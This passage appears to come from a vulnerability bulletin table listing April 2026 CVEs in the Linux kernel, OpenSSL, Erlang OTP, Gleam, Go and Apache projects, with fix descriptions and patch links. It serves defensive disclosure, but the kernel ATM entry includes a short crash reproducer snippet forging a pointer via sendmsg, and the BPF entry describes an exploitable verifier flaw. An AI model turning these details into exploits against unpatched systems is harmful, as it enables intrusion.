<a href=3D"https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7= d281a772" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772</a><br><a href=3D"https://git.ke= rnel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75= d01f8b2e56d489a60</a><br><a href=3D"https://git.kernel.org/stable/c/282343c= f8a4a5a3603b1cb0e17a7083e4a593b03" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: ksm= bd: use volume UUID in FS_OBJECT_ID_INFORMATION Use sb-&gt;s_uuid for a pro= per volume identifier as the primary choice. For filesystems that do not pr= ovide a UUID, fall back to stfs.f_fsid obtained from vfs_statfs().</td> <td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31410" target=3D= "_blank" rel=3D"noopener">CVE-2026-31410</a></td>

<a href=3D"https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51= f4669227" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/ce00616bc1df675bfdacc968f2bf7c51f4669227</a><br><a href=3D"https://git.ke= rnel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b= 0c1a0c56d804f8a0a</a><br><a href=3D"https://git.kernel.org/stable/c/c283a6f= fe6d5d6e5594d991286b9ce15951572e1" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1</a><br>=
<a href=3D"https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2= e14f7308" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/3a64125730cabc34fccfbc230c2667c2e14f7308</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: net=
: atm: fix crash due to unvalidated vcc pointer in sigd_send() Reproducer a= vailable at [1]. The ATM send path (sendmsg -&gt; vcc_sendmsg -&gt; sigd_se= nd) reads the vcc pointer from msg-&gt;vcc and uses it directly without any=
validation. This pointer comes from userspace via sendmsg() and can be arb= itrarily forged: int fd =3D socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(fd, ATM= SIGD_CTRL); // become ATM signaling daemon struct msghdr msg =3D { .msg_iov=
=3D &amp;iov, ... }; *(unsigned long *)(buf + 4) =3D 0xdeadbeef; // fake v=
cc pointer sendmsg(fd, &amp;msg, 0); // kernel dereferences 0xdeadbeef In n= ormal operation, the kernel sends the vcc pointer to the signaling daemon v=
ia sigd_enq() when processing operations like connect(), bind(), or listen(=
). The daemon is expected to return the same pointer when responding. Howev= er, a malicious daemon can send arbitrary pointer values. Fix this by intro= ducing find_get_vcc() which validates the pointer by searching through vcc_= hash (similar to how sigd_close() iterates over all VCCs), and acquires a r= eference via sock_hold() if found. Since struct atm_vcc embeds struct sock =
as its first member, they share the same lifetime. Therefore using sock_hol= d/sock_put is sufficient to keep the vcc alive while it is being used. Note=
that there may be a race with sigd_close() which could mark the vcc with v= arious flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However,=
sock_hold() guarantees the memory remains valid, so this race only affects=
the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1= ba5949c45529c511152e2f4c755b0f3</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31411" target=3D= "_blank" rel=3D"noopener">CVE-2026-31411</a></td>

<a href=3D"https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb407115= 74424840" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/c96549d07dfdd51aadf0722cfb40711574424840</a><br><a href=3D"https://git.ke= rnel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/1c8bda3df028d5e54134077= dcd09f46ca8cfceb5</a><br><a href=3D"https://git.kernel.org/stable/c/3e1a8b0= 0095246a9a2b46b57f6d471c6d3c00ed2" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2</a><br>=
<a href=3D"https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c= 43aa1067" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/e3f80666c2739296c3b69a127300455c43aa1067</a><br><a href=3D"https://git.ke= rnel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/21c303fec138c002f90ed33= bce60e807d53072bb</a><br><a href=3D"https://git.kernel.org/stable/c/69d3f9e= e5489e6e8b66defcfa226e91d82393297" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297</a><br>=
<a href=3D"https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250= b8398651" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/440c9a5fc477a8ee259d8bf669531250b8398651</a><br><a href=3D"https://git.ke= rnel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04= 086734439d074a643</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb=
: gadget: f_mass_storage: Fix potential integer overflow in check_command_s= ize_in_blocks() The `check_command_size_in_blocks()` function calculates th=
e data size in bytes by left shifting `common-&gt;data_size_from_cmnd` by t=
he block size (`common-&gt;curlun-&gt;blkbits`). However, it does not valid= ate whether this shift operation will cause an integer overflow. Initially,=
the block size is set up in `fsg_lun_open()` , and the `common-&gt;data_si= ze_from_cmnd` is set up in `do_scsi_command()`. During initialization, ther=
e is no integer overflow check for the interaction between two variables. S=
o if a malicious USB host sends a SCSI READ or WRITE command requesting a l= arge amount of data (`common-&gt;data_size_from_cmnd`), the left shift oper= ation can wrap around. This results in a truncated data size, which can byp= ass boundary checks and potentially lead to memory corruption or out-of-bou= nds accesses. Fix this by using the check_shl_overflow() macro to safely pe= rform the shift and catch any overflows.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31412" target=3D= "_blank" rel=3D"noopener">CVE-2026-31412</a></td>

<a href=3D"https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5= d01125cc" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/91817ad5452defe69bc7bc0e355f0ed5d01125cc</a><br><a href=3D"https://git.ke= rnel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/ce0caaed5940162780c5c22= 3b8ae54968a5f059b</a><br><a href=3D"https://git.kernel.org/stable/c/228b379= 36376143f4b60cc6828663f6eaceb81b5" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5</a><br>=
<a href=3D"https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341b= f9a1f8b3" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3</a><br><a href=3D"https://git.ke= rnel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/387ebb0453b99d71491419a= 5dc4ab4bee0cacbac</a><br><a href=3D"https://git.kernel.org/stable/c/8479891= d1f04a8ce55366fe4ca361ccdb96f02e1" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Linux--Linux</td>
<td>In the Linux kernel, the following vulnerability has been resolved: bpf=
: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR maybe_fork_= scalars() is called for both BPF_AND and BPF_OR when the source operand is =
a constant. When dst has signed range [-1, 0], it forks the verifier state:=
the pushed path gets dst =3D 0, the current path gets dst =3D -1. For BPF_= AND this is correct: 0 &amp; K =3D=3D 0. For BPF_OR this is wrong: 0 | K = =3D=3D K, not 0. The pushed path therefore tracks dst as 0 when the runtime=
value is K, producing an exploitable verifier/runtime divergence that allo=
ws out-of-bounds map access. Fix this by passing env-&gt;insn_idx (instead =
of env-&gt;insn_idx + 1) to push_stack(), so the pushed path re-executes th=
e ALU instruction with dst =3D 0 and naturally computes the correct result = for any opcode.</td>
<td>2026-04-12</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31413" target=3D= "_blank" rel=3D"noopener">CVE-2026-31413</a></td>

<a href=3D"https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e512= 18d76fa4" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4</a><br><a href=3D"https://git.ke= rnel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7" target=3D"_blan=
k" rel=3D"noopener">https://git.kernel.org/stable/c/58bd87d0e69204dbd739e43= 87a1edb0c4b1644e7</a><br><a href=3D"https://git.kernel.org/stable/c/d13281a= e7ea8902b21d99d10a2c8caf0bdec0455" target=3D"_blank" rel=3D"noopener">https= ://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455</a><br>=
<a href=3D"https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942= 550910c5" target=3D"_blank" rel=3D"noopener">https://git.kernel.org/stable/= c/c845894ebd6fb43226b3118d6b017942550910c5</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: Converting an excessively large OCTET STRING value to a = hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Imp= act summary: A heap buffer overflow may lead to a crash or possibly an atta= cker controlled code execution or other undefined behavior. If an attacker = can supply a crafted X.509 certificate with an excessively large OCTET STRI=
NG value in extensions such as the Subject Key Identifier (SKID) or Authori=
ty Key Identifier (AKID) which are being converted to hex, the size of the = buffer needed for the result is calculated as multiplication of the input l= ength by 3. On 32 bit platforms, this multiplication may overflow resulting=
in the allocation of a smaller buffer and a heap buffer overflow. Applicat= ions and services that print or log contents of untrusted X.509 certificate=
s are vulnerable to this issue. As the certificates would have to have size=
s of over 1 Gigabyte, printing or logging such certificates is a fairly unl= ikely operation and only 32 bit platforms are affected, this issue was assi= gned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not a= ffected by this issue, as the affected code is outside the OpenSSL FIPS mod= ule boundary.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31789" target=3D= "_blank" rel=3D"noopener">CVE-2026-31789</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa6= 5ecf" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9= 930f0521" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: Applications using RSASVE key encapsulation to establish=
a secret encryption key can send contents of an uninitialized memory buffe=
r to a malicious peer. Impact summary: The uninitialized buffer might conta=
in sensitive data from the previous execution of the application process wh= ich leads to sensitive data leakage to an attacker. RSA_public_encrypt() re= turns the number of bytes written on success and -1 on error. The affected = code tests only whether the return value is non-zero. As a result, if RSA e= ncryption fails, encapsulation can still return success to the caller, set = the output lengths, and leave the caller to use the contents of the ciphert= ext buffer as if a valid KEM ciphertext had been produced. If applications = use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid = RSA public key without first validating that key, then this may cause stale=
or uninitialized contents of the caller-provided ciphertext buffer to be d= isclosed to the attacker in place of the KEM ciphertext. As a workaround ca= lling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_P= KEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.=
4, 3.3, 3.1 and 3.0 are affected by this issue.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31790" target=3D= "_blank" rel=3D"noopener">CVE-2026-31790</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7= e406" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e2= 84df379e" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Sonatype--Nexus Repository</td>
<td>A vulnerability in the task management component of Sonatype Nexus Repo= sitory versions 3.22.1 through 3.90.2 allows an authenticated attacker with=
task creation permissions to execute arbitrary code, bypassing the nexus.s= cripts.allowCreation security control.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3199" target=3D"= _blank" rel=3D"noopener">CVE-2026-3199</a></td>

<a href=3D"https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-re= lease-notes.html" target=3D"_blank" rel=3D"noopener">https://help.sonatype.= com/en/sonatype-nexus-repository-3-91-0-release-notes.html</a><br><a href= =3D"https://support.sonatype.com/hc/en-us/articles/50615414548499" target= =3D"_blank" rel=3D"noopener">https://support.sonatype.com/hc/en-us/articles= /50615414548499</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Erlang--OTP</td>
<td>Improper Certificate Validation vulnerability in Erlang OTP public_key = (pubkey_ocsp module) allows OCSP designated-responder authorization bypass = via missing signature verification. The OCSP response validation in public_= key:pkix_ocsp_validate/5 does not verify that a CA-designated responder cer= tificate was cryptographically signed by the issuing CA. Instead, it only c= hecks that the responder certificate's issuer name matches the CA's subject=
name and that the certificate has the OCSPSigning extended key usage. An a= ttacker who can intercept or control OCSP responses can create a self-signe=
d certificate with a matching issuer name and the OCSPSigning EKU, and use =
it to forge OCSP responses that mark revoked certificates as valid. This af= fects SSL/TLS clients using OCSP stapling, which may accept connections to = servers with revoked certificates, potentially transmitting sensitive data =
to compromised servers. Applications using the public_key:pkix_ocsp_validat= e/5 API directly are also affected, with impact depending on usage context.=
This vulnerability is associated with program files lib/public_key/src/pub= key_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. Th=
is issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 correspon= ding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 u= ntil 11.5.4 and 11.2.12.7.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32144" target=3D= "_blank" rel=3D"noopener">CVE-2026-32144</a></td>

<a href=3D"https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64= -99xm" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/sec= urity/advisories/GHSA-gxrm-pf64-99xm</a><br><a href=3D"https://cna.erlef.or= g/cves/CVE-2026-32144.html" target=3D"_blank" rel=3D"noopener">https://cna.= erlef.org/cves/CVE-2026-32144.html</a><br><a href=3D"https://osv.dev/vulner= ability/EEF-CVE-2026-32144" target=3D"_blank" rel=3D"noopener">https://osv.= dev/vulnerability/EEF-CVE-2026-32144</a><br><a href=3D"https://www.erlang.o= rg/doc/system/versions.html#order-of-versions" target=3D"_blank" rel=3D"noo= pener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a= ><br><a href=3D"https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29= c7f24106e3a16d4891" target=3D"_blank" rel=3D"noopener">https://github.com/e= rlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891</a><br><a href=3D= "https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e= 0c0" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/commi= t/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Gleam--Gleam</td>
<td>Improper path validation vulnerability in the Gleam compiler's handling=
of git dependencies allows arbitrary file system modification during depen= dency download. Dependency names from gleam.toml and manifest.toml are inco= rporated into filesystem paths without sufficient validation or confinement=
to the intended dependency directory, allowing attacker-controlled paths (= via relative traversal such as ../ or absolute paths) to target filesystem = locations outside that directory. When resolving git dependencies (e.g. via=
gleam deps download), the computed path is used for filesystem operations = including directory deletion and creation. This vulnerability occurs during=
the dependency resolution and download phase, which is generally expected =
to be limited to fetching and preparing dependencies within a confined dire= ctory. A malicious direct or transitive git dependency can exploit this iss=
ue to delete and overwrite arbitrary directories outside the intended depen= dency directory, including attacker-chosen absolute paths, potentially caus= ing data loss. In some environments, this may be further leveraged to achie=
ve code execution, for example by overwriting git hooks or shell configurat= ion files. This issue affects Gleam from 1.9.0-rc1 until 1.15.3 and 1.16.0-= rc1.</td>
<td>2026-04-11</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32146" target=3D= "_blank" rel=3D"noopener">CVE-2026-32146</a></td>

<a href=3D"https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5= j-55vx-wq8j" target=3D"_blank" rel=3D"noopener">https://github.com/gleam-la= ng/gleam/security/advisories/GHSA-vq5j-55vx-wq8j</a><br><a href=3D"https://= cna.erlef.org/cves/CVE-2026-32146.html" target=3D"_blank" rel=3D"noopener">= https://cna.erlef.org/cves/CVE-2026-32146.html</a><br><a href=3D"https://os= v.dev/vulnerability/EEF-CVE-2026-32146" target=3D"_blank" rel=3D"noopener">= https://osv.dev/vulnerability/EEF-CVE-2026-32146</a><br><a href=3D"https://= github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf=
" target=3D"_blank" rel=3D"noopener">https://github.com/gleam-lang/gleam/co= mmit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf</a><br><a href=3D"https://git= hub.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78" t= arget=3D"_blank" rel=3D"noopener">https://github.com/gleam-lang/gleam/commi= t/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--crypto/x509</td>
<td>During chain building, the amount of work that is done is not correctly=
limited when a large number of intermediate certificates are passed in Ver= ifyOptions.Intermediates, which can lead to a denial of service. This affec=
ts both direct users of crypto/x509 and users of crypto/tls.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32280" target=3D= "_blank" rel=3D"noopener">CVE-2026-32280</a></td>

<a href=3D"https://go.dev/cl/758320" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/758320</a><br><a href=3D"https://go.dev/issue/78282" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78282</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4947" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4947</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--crypto/x509</td> <td>Validating certificate chains which use policies is unexpectedly ineffi= cient when certificates in the chain contain a very large number of policy = mappings, possibly causing denial of service. This only affects validation =
of otherwise trusted certificate chains, issued by a root CA in the VerifyO= ptions.Roots CertPool, or in the system certificate pool.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32281" target=3D= "_blank" rel=3D"noopener">CVE-2026-32281</a></td>

<a href=3D"https://go.dev/cl/758061" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/758061</a><br><a href=3D"https://go.dev/issue/78281" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78281</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4946" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4946</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--internal/syscall/unix</td=

<td>On Linux, if the target of Root.Chmod is replaced with a symlink while = the chmod operation is in progress, Chmod can operate on the target of the = symlink, even when the target lies outside the root. The Linux fchmodat sys= call silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses t=
o avoid symlink traversal. Root.Chmod checks its target before acting and r= eturns an error if the target is a symlink lying outside the root, so the i= mpact is limited to cases where the target is replaced with a symlink betwe=
en the check and operation.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32282" target=3D= "_blank" rel=3D"noopener">CVE-2026-32282</a></td>

<a href=3D"https://go.dev/cl/763761" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/763761</a><br><a href=3D"https://go.dev/issue/78293" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78293</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4864" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4864</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--crypto/tls</td>
<td>If one side of the TLS connection sends multiple key update messages po= st-handshake in a single record, the connection can deadlock, causing uncon= trolled consumption of resources. This can lead to a denial of service. Thi=
s only affects TLS 1.3.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32283" target=3D= "_blank" rel=3D"noopener">CVE-2026-32283</a></td>

<a href=3D"https://go.dev/cl/763767" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/763767</a><br><a href=3D"https://go.dev/issue/78334" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78334</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4870" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4870</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--archive/tar</td> <td>tar.Reader can allocate an unbounded amount of memory when reading a ma= liciously-crafted archive containing a large number of sparse regions encod=
ed in the "old GNU sparse map" format.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32288" target=3D= "_blank" rel=3D"noopener">CVE-2026-32288</a></td>

<a href=3D"https://go.dev/cl/763766" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/763766</a><br><a href=3D"https://go.dev/issue/78301" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78301</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4869" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4869</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Go standard library--html/template</td> <td>Context was not properly tracked across template branches for JS templa=
te literals, leading to possibly incorrect escaping of content when branche=
s were used. Additionally template actions within JS template literals did = not properly track the brace depth, leading to incorrect escaping being app= lied. These issues could cause actions within JS template literals to be in= correctly or improperly escaped, leading to XSS vulnerabilities.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32289" target=3D= "_blank" rel=3D"noopener">CVE-2026-32289</a></td>

<a href=3D"https://go.dev/cl/763762" target=3D"_blank" rel=3D"noopener">htt= ps://go.dev/cl/763762</a><br><a href=3D"https://go.dev/issue/78331" target= =3D"_blank" rel=3D"noopener">https://go.dev/issue/78331</a><br><a href=3D"h= ttps://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target=3D"_blank"=
rel=3D"noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU= </a><br><a href=3D"https://pkg.go.dev/vuln/GO-2026-4865" target=3D"_blank" = rel=3D"noopener">https://pkg.go.dev/vuln/GO-2026-4865</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Cassandra</=

<td>Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows aut= henticated user to raise query latencies via repeated password changes. Use=
rs are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes=
this issue.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32588" target=3D= "_blank" rel=3D"noopener">CVE-2026-32588</a></td>

<a href=3D"https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/2tnwjd= nss378glxrsmnlzz3k53ftphrc</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Improper Input Validation vulnerability in Apache Tomcat due to an inco= mplete fix of CVE-2025-66614. This issue affects Apache Tomcat: from 11.0.1=
5 through 11.0.19, from 10.1.50 through 10.1.52, from 9.0.113 through 9.0.1= 15. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116=
, which fix the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32990" target=3D= "_blank" rel=3D"noopener">CVE-2026-32990</a></td>

<a href=3D"https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/1nl9zq= ft0ksqlhlkd3j4obyjz1ghoyn7</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache OpenMeeting= s</td>
<td>Improper Handling of Insufficient Privileges vulnerability in Apache Op= enMeetings. Any registered user can query web service with their credential=
s and get files/sub-folders of any folder by ID (metadata only NOT contents=
). Metadata includes id, type, name and some other field. Full list of fiel=
ds get be checked at=C2=A0FileItemDTO=C2=A0object. This issue affects Apach=
e OpenMeetings: from 3.10 before 9.0.0. Users are recommended to upgrade to=
version 9.0.0, which fixes the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33005" target=3D= "_blank" rel=3D"noopener">CVE-2026-33005</a></td>

